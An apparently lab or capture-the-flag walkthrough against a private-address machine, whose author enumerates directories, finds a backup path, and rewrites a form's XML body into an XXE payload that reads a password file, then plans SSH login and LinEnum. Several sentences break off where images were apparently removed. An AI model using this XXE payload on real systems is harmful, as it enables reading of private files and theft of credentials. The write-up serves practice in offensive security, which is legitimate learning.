MACHINE IP: 10.1.1.30
START TIME: 1:40 PM
I don’t know why it showed the port
7007 as filtered, because when I checked that port I got
hmm…So we have some accesible directories. Let’s see what we can find in them.
I got nothing interesting in the
img but in
backup/ we got another URL
I couldn’t figure out what this path refering to until I saw
XML function in the
source of the page.
This is basically reference to
XXE attack. The path that we got from
backup is actually telling us where’s the
password are kept or in other words we have to use XXE to access that file/path.
Now, If we capture the request sent while submitting the form we will find the following XML in body request
<?xml version="1.0" encoding="UTF-8"?> <root> <name>name</name> <tel>tel</tel> <email>email</email> <password>passswrd</password> </root>
Instead of sending this we can edit the code to be
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///home/lord/password_backup.txt" >]> <root> <name>me</name> <tel>666</tel> <email>&xxe;</email> <password></password> </root>
This is XXE attack.
Okay so now we have the user name
lord and password
Just ssh into machine using those credentials and get the user.
- get LinENum make a script with nano()